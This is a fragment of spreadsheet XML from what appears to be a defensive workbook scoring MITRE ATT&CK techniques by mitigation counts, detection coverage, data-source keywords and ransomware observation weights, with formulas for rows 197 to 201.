      <c r="B197" s="25">
        <f>SUM(H197,M197,V197)*(1+SUM(AE197,AG197,AI197,AK197,AM197))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C197" s="25" t="s">
        <v>868</v>
      </c>
      <c r="D197" s="25" t="s">
        <v>869</v>
      </c>
      <c r="E197" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F197" s="51">
        <v>1</v>
      </c>
      <c r="G197" s="51">
        <v>1</v>
      </c>
      <c r="H197" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I197">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J197">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K197">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L197">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M197" s="25">
        <v>0</v>
      </c>
      <c r="N197" s="51">
        <v>0</v>
      </c>
      <c r="O197" s="51">
        <v>0</v>
      </c>
      <c r="P197" s="51">
        <v>0</v>
      </c>
      <c r="Q197" s="51">
        <v>0</v>
      </c>
      <c r="R197" s="52" t="s">
        <v>870</v>
      </c>
      <c r="S197" s="51">
        <v>6</v>
      </c>
      <c r="T197" s="51" t="s">
        <v>871</v>
      </c>
      <c r="U197" s="51">
        <v>19</v>
      </c>
      <c r="V197" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523811</v>
      </c>
      <c r="W197">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X197">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y197">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z197">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA197">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB197">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC197" s="29" t="s">
        <v>112</v>
      </c>
      <c r="AD197" s="25" t="str" cm="1">
        <f t="array" ref="AD197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC197)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE197" s="25">
        <f>IF(AD197="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF197" s="25" t="str" cm="1">
        <f t="array" ref="AF197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC197)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG197" s="25">
        <f>IF(AF197="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH197" s="25" t="str" cm="1">
        <f t="array" ref="AH197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC197)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI197" s="25">
        <f>IF(AH197="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ197" s="25" t="str" cm="1">
        <f t="array" ref="AJ197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC197)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK197" s="25">
        <f>IF(AJ197="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL197" s="25" t="str" cm="1">
        <f t="array" ref="AL197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC197)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM197" s="25">
        <f>IF(AL197="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN197" s="58">
        <v>0</v>
      </c>
      <c r="AO197" s="51">
        <v>0</v>
      </c>
      <c r="AP197" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ197" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR197" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS197" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT197" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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98" spans="1:47" ht="48">
      <c r="A198" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="B198" s="25">
        <f>SUM(H198,M198,V198)*(1+SUM(AE198,AG198,AI198,AK198,AM198))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C198" s="25" t="s">
        <v>872</v>
      </c>
      <c r="D198" s="25" t="s">
        <v>869</v>
      </c>
      <c r="E198" s="25" t="s">
        <v>873</v>
      </c>
      <c r="F198" s="51">
        <v>1</v>
      </c>
      <c r="G198" s="51">
        <v>1</v>
      </c>
      <c r="H198" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I198">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J198">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K198">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L198">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M198" s="25">
        <v>0</v>
      </c>
      <c r="N198" s="51">
        <v>0</v>
      </c>
      <c r="O198" s="51">
        <v>0</v>
      </c>
      <c r="P198" s="51">
        <v>0</v>
      </c>
      <c r="Q198" s="51">
        <v>0</v>
      </c>
      <c r="R198" s="52" t="s">
        <v>870</v>
      </c>
      <c r="S198" s="51">
        <v>6</v>
      </c>
      <c r="T198" s="51" t="s">
        <v>871</v>
      </c>
      <c r="U198" s="51">
        <v>19</v>
      </c>
      <c r="V198" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523811</v>
      </c>
      <c r="W198">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X198">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y198">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z198">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA198">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB198">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC198" s="29" t="s">
        <v>112</v>
      </c>
      <c r="AD198" s="25" t="str" cm="1">
        <f t="array" ref="AD198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC198)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE198" s="25">
        <f>IF(AD198="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF198" s="25" t="str" cm="1">
        <f t="array" ref="AF198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC198)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG198" s="25">
        <f>IF(AF198="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH198" s="25" t="str" cm="1">
        <f t="array" ref="AH198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC198)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI198" s="25">
        <f>IF(AH198="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ198" s="25" t="str" cm="1">
        <f t="array" ref="AJ198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC198)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK198" s="25">
        <f>IF(AJ198="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL198" s="25" t="str" cm="1">
        <f t="array" ref="AL198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC198)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM198" s="25">
        <f>IF(AL198="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN198" s="59">
        <v>0</v>
      </c>
      <c r="AO198" s="51">
        <v>0</v>
      </c>
      <c r="AP198" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ198" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR198" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS198" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT198" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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199" spans="1:47" ht="48">
      <c r="A199" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="B199" s="25">
        <f>SUM(H199,M199,V199)*(1+SUM(AE199,AG199,AI199,AK199,AM199))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C199" s="25" t="s">
        <v>874</v>
      </c>
      <c r="D199" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E199" s="25" t="s">
        <v>875</v>
      </c>
      <c r="F199" s="51">
        <v>1</v>
      </c>
      <c r="G199" s="51">
        <v>1</v>
      </c>
      <c r="H199" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I199">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J199">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K199">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L199">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M199" s="25">
        <v>0</v>
      </c>
      <c r="N199" s="51">
        <v>0</v>
      </c>
      <c r="O199" s="51">
        <v>0</v>
      </c>
      <c r="P199" s="51">
        <v>0</v>
      </c>
      <c r="Q199" s="51">
        <v>0</v>
      </c>
      <c r="R199" s="52" t="s">
        <v>876</v>
      </c>
      <c r="S199" s="51">
        <v>10</v>
      </c>
      <c r="T199" s="51" t="s">
        <v>877</v>
      </c>
      <c r="U199" s="51">
        <v>15</v>
      </c>
      <c r="V199" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523811</v>
      </c>
      <c r="W199">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X199">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y199">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z199">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA199">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB199">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC199" s="29" t="s">
        <v>878</v>
      </c>
      <c r="AD199" s="25" t="str" cm="1">
        <f t="array" ref="AD199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC199)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE199" s="25">
        <f>IF(AD199="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF199" s="25" t="str" cm="1">
        <f t="array" ref="AF199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC199)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG199" s="25">
        <f>IF(AF199="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH199" s="25" t="str" cm="1">
        <f t="array" ref="AH199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC199)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI199" s="25">
        <f>IF(AH199="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ199" s="25" t="str" cm="1">
        <f t="array" ref="AJ199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC199)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK199" s="25">
        <f>IF(AJ199="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL199" s="25" t="str" cm="1">
        <f t="array" ref="AL199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC199)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM199" s="25">
        <f>IF(AL199="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN199" s="52">
        <v>0</v>
      </c>
      <c r="AO199" s="51">
        <v>0</v>
      </c>
      <c r="AP199" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ199" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR199" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS199" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT199" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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00" spans="1:47" ht="63.95">
      <c r="A200" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="B200" s="25">
        <f>SUM(H200,M200,V200)*(1+SUM(AE200,AG200,AI200,AK200,AM200))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C200" s="25" t="s">
        <v>879</v>
      </c>
      <c r="D200" s="25" t="s">
        <v>880</v>
      </c>
      <c r="E200" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F200" s="51">
        <v>1</v>
      </c>
      <c r="G200" s="51">
        <v>1</v>
      </c>
      <c r="H200" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I200">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J200">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K200">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L200">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M200" s="25">
        <v>0</v>
      </c>
      <c r="N200" s="51">
        <v>0</v>
      </c>
      <c r="O200" s="51">
        <v>0</v>
      </c>
      <c r="P200" s="51">
        <v>0</v>
      </c>
      <c r="Q200" s="51">
        <v>0</v>
      </c>
      <c r="R200" s="52" t="s">
        <v>881</v>
      </c>
      <c r="S200" s="51">
        <v>11</v>
      </c>
      <c r="T200" s="52" t="s">
        <v>882</v>
      </c>
      <c r="U200" s="51">
        <v>14</v>
      </c>
      <c r="V200" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523811</v>
      </c>
      <c r="W200">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X200">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y200">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z200">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA200">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB200">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC200" s="29" t="s">
        <v>883</v>
      </c>
      <c r="AD200" s="25" t="str" cm="1">
        <f t="array" ref="AD200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC200)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE200" s="25">
        <f>IF(AD200="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF200" s="25" t="str" cm="1">
        <f t="array" ref="AF200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC200)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG200" s="25">
        <f>IF(AF200="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH200" s="25" t="str" cm="1">
        <f t="array" ref="AH200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC200)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI200" s="25">
        <f>IF(AH200="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ200" s="25" t="str" cm="1">
        <f t="array" ref="AJ200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC200)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK200" s="25">
        <f>IF(AJ200="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL200" s="25" t="str" cm="1">
        <f t="array" ref="AL200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC200)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM200" s="25">
        <f>IF(AL200="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN200" s="60">
        <v>0</v>
      </c>
      <c r="AO200" s="51">
        <v>0</v>
      </c>
      <c r="AP200" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ200" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR200" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS200" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT200" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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01" spans="1:47" ht="32.1">
      <c r="A201" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="B201" s="25">
        <f>SUM(H201,M201,V201)*(1+SUM(AE201,AG201,AI201,AK201,AM201))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C201" s="25" t="s">
        <v>884</v>
      </c>
      <c r="D201" s="25" t="s">
        <v>460</v>
      </c>
      <c r="E201" s="25" t="s">
        <v>885</v>
      </c>
      <c r="F201" s="51">
        <v>1</v>
      </c>
      <c r="G201" s="51">
        <v>1</v>
      </c>
      <c r="H201" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I201">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J201">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K201">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L201">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M201" s="25">
        <v>0</v>
      </c>
      <c r="N201" s="51">
        <v>0</v>
      </c>
      <c r="O201" s="51">
        <v>0</v>
      </c>
      <c r="P201" s="51">
        <v>0</v>
      </c>
      <c r="Q201" s="51">
        <v>0</v>
      </c>
      <c r="R201" s="52" t="s">
        <v>886</v>
      </c>
      <c r="S201" s="51">
        <v>5</v>
      </c>
      <c r="T201" s="52" t="s">
        <v>887</v>
      </c>
      <c r="U201" s="51">
        <v>20</v>
      </c>
      <c r="V201" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523811</v>
      </c>
      <c r="W201">
